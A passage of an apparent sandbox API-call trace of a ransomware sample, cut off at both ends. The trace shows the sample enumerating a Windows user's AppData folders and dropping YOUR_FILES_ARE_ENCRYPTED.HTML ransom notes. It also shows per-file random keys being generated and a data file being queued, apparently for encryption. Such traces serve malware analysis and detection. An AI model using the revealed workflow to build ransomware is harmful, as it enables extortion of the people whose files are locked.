pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 129 [0115.571] GetProcessHeap () returned 0x600000 [0115.571] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.572] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bioenrollment_cw5n1h2txyewy\\roamingstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0115.572] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0115.578] CloseHandle (hObject=0x32c) returned 1 [0115.578] GetProcessHeap () returned 0x600000 [0115.578] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.578] GetProcessHeap () returned 0x600000 [0115.578] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0115.578] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4e7c2b0c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4e8352ee, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4e8352ee, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Settings", cAlternateFileName="")) returned 1 [0115.579] StrStrIW (lpFirst="Settings", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.579] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\Settings") returned 95 [0115.579] GetProcessHeap () returned 0x600000 [0115.579] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0115.580] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\Settings" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\Settings") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\Settings" [0115.580] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\Settings", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\Settings\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\Settings\\*" [0115.580] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\Settings\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4e7c2b0c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4e8352ee, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x91215d9d, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315e0a6, dwReserved1=0x315dff8, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0115.581] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4e7c2b0c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4e8352ee, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x91215d9d, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315e0a6, dwReserved1=0x315dff8, cFileName="..", cAlternateFileName="")) returned 1 [0115.581] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e8352ee, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4e8352ee, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4e8352ee, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315e0a6, dwReserved1=0x315dff8, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0115.581] StrStrIW (lpFirst="roaming.lock", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.581] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\Settings\\roaming.lock") returned 108 [0115.581] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0115.581] lstrlenW (lpString=".lock") returned 5 [0115.581] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0115.581] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e8352ee, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x916b486a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x916b486a, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x315e0a6, dwReserved1=0x315dff8, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0115.581] StrStrIW (lpFirst="settings.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.581] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\Settings\\settings.dat") returned 108 [0115.581] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0115.581] lstrlenW (lpString=".dat") returned 4 [0115.581] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0115.581] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0115.581] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\Settings\\settings.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bioenrollment_cw5n1h2txyewy\\settings\\settings.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x214 [0115.582] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=8192) returned 1 [0115.582] GetProcessHeap () returned 0x600000 [0115.582] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30f2fc0 [0115.593] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="3D") returned 2 [0115.594] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="B7") returned 2 [0115.594] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="B4") returned 2 [0115.594] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="1D") returned 2 [0115.594] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="F8") returned 2 [0115.594] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="5D") returned 2 [0115.594] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="8E") returned 2 [0115.594] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="5E") returned 2 [0115.594] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="7F") returned 2 [0115.594] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="01") returned 2 [0115.594] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="A7") returned 2 [0115.594] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="B8") returned 2 [0115.594] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="C1") returned 2 [0115.594] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="6F") returned 2 [0115.594] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="7B") returned 2 [0115.594] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="FB") returned 2 [0115.594] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="FF") returned 2 [0115.594] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="4B") returned 2 [0115.594] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="F5") returned 2 [0115.594] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="93") returned 2 [0115.594] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="29") returned 2 [0115.594] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="9F") returned 2 [0115.594] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="94") returned 2 [0115.594] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="3F") returned 2 [0115.594] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="E0") returned 2 [0115.594] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="4B") returned 2 [0115.594] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="EA") returned 2 [0115.594] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="F8") returned 2 [0115.594] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="4D") returned 2 [0115.594] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="DE") returned 2 [0115.594] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="2B") returned 2 [0115.594] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="06") returned 2 [0115.595] lstrcpyW (in: lpString1=0x3103074, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\Settings\\settings.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\Settings\\settings.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\Settings\\settings.dat" [0115.595] CreateIoCompletionPort (FileHandle=0x214, ExistingCompletionPort=0x274, CompletionKey=0x30f2fc0, NumberOfConcurrentThreads=0x0) returned 0x274 [0115.595] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30f2fc0, lpOverlapped=0x30f2fc0) returned 1 [0115.595] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x91131126, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x91131126, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x91131126, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x315e0a6, dwReserved1=0x315dff8, cFileName="settings.dat.LOG1", cAlternateFileName="SETTIN~1.LOG")) returned 1 [0115.595] StrStrIW (lpFirst="settings.dat.LOG1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.595] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\Settings\\settings.dat.LOG1") returned 113 [0115.595] PathFindExtensionW (pszPath="settings.dat.LOG1") returned=".LOG1" [0115.595] lstrlenW (lpString=".LOG1") returned 5 [0115.595] PathFindExtensionW (pszPath="settings.dat.LOG1") returned=".LOG1" [0115.595] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x9115737d, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x9115737d, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x9115737d, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315e0a6, dwReserved1=0x315dff8, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 1 [0115.595] StrStrIW (lpFirst="settings.dat.LOG2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.595] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\Settings\\settings.dat.LOG2") returned 113 [0115.595] PathFindExtensionW (pszPath="settings.dat.LOG2") returned=".LOG2" [0115.595] lstrlenW (lpString=".LOG2") returned 5 [0115.595] PathFindExtensionW (pszPath="settings.dat.LOG2") returned=".LOG2" [0115.595] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x9115737d, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x9115737d, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x9115737d, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315e0a6, dwReserved1=0x315dff8, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 0 [0115.595] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0115.596] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 125 [0115.596] GetProcessHeap () returned 0x600000 [0115.596] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.596] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bioenrollment_cw5n1h2txyewy\\settings\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0115.597] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0115.598] CloseHandle (hObject=0x32c) returned 1 [0115.598] GetProcessHeap () returned 0x600000 [0115.598] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.598] GetProcessHeap () returned 0x600000 [0115.598] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0115.599] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4e80efb1, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4e80efb1, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4e80efb1, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0115.599] StrStrIW (lpFirst="SystemAppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.599] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\SystemAppData") returned 100 [0115.599] GetProcessHeap () returned 0x600000 [0115.599] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0115.600] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\SystemAppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\SystemAppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\SystemAppData" [0115.600] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\SystemAppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\SystemAppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\SystemAppData\\*" [0115.600] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\SystemAppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4e80efb1, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4e80efb1, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4e80efb1, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315e0a6, dwReserved1=0x315dff8, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0115.600] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4e80efb1, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4e80efb1, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4e80efb1, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315e0a6, dwReserved1=0x315dff8, cFileName="..", cAlternateFileName="")) returned 1 [0115.600] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4e80efb1, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4e80efb1, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4e80efb1, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315e0a6, dwReserved1=0x315dff8, cFileName="..", cAlternateFileName="")) returned 0 [0115.600] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0115.600] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 130 [0115.600] GetProcessHeap () returned 0x600000 [0115.600] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.601] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bioenrollment_cw5n1h2txyewy\\systemappdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0115.601] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0115.602] CloseHandle (hObject=0x32c) returned 1 [0115.602] GetProcessHeap () returned 0x600000 [0115.602] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.602] GetProcessHeap () returned 0x600000 [0115.602] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0115.602] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4e77658a, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4e77658a, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4e77658a, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0115.602] StrStrIW (lpFirst="TempState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.602] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\TempState") returned 96 [0115.602] GetProcessHeap () returned 0x600000 [0115.602] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0115.603] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\TempState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\TempState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\TempState" [0115.603] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\TempState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\TempState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\TempState\\*" [0115.603] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\TempState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4e77658a, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4e77658a, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4e77658a, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315e0a6, dwReserved1=0x315dff8, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0115.603] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4e77658a, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4e77658a, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4e77658a, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315e0a6, dwReserved1=0x315dff8, cFileName="..", cAlternateFileName="")) returned 1 [0115.603] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4e77658a, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4e77658a, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4e77658a, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315e0a6, dwReserved1=0x315dff8, cFileName="..", cAlternateFileName="")) returned 0 [0115.603] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0115.603] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 126 [0115.603] GetProcessHeap () returned 0x600000 [0115.603] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.603] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bioenrollment_cw5n1h2txyewy\\tempstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0115.604] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, 